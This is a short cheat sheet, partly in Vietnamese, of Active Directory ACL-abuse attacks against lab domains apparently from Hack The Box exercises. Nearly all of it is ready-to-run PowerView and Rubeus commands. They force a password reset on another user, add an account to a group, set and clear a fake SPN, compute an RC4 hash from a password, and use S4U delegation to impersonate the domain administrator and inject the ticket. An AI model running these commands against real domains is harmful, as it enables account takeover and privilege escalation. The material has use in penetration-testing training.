Abuse some ACL

Just another cheatsheet

ForceChangePassword

Import .\Power-View.ps1
Set-DomainUserPassword -Domain painters.htb -Identity blake -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose

GenericWrite

Add user to group

$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose

Add fake SPN

Set-DomainObject -Credential $Cred -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

Remove SPN

Set-DomainObject -Credential $Cred -Identity adunn -Clear serviceprincipalname -Verbose

AllowedToDelegate

Khái niệm delegate:

User has to have an attribute TRUSTED_TO_AUTH_FOR_DELEGATION in order for it to be able to authenticate to the remote service.

TRUSTED_TO_AUTH_FOR_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.

https://support.microsoft.com/en-gb/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties

Check msds bằng Powerview

Get-NetUser -TrustedToAuth

Dump RC4 từ cleartext password

Rubeus.exe hash /domain:"DC.painters.htb" /user:"blake" /password:"Password123!"

Pass the ticket

Rubeus.exe s4u /nowrap /msdsspn:"cifs/DC.painters.htb" /impersonateuser:"administrator" /domain:"painters.htb" /user:"blake" /rc4:"2B576ACBE6BCFDA7294D6BD18041B8FE" /ptt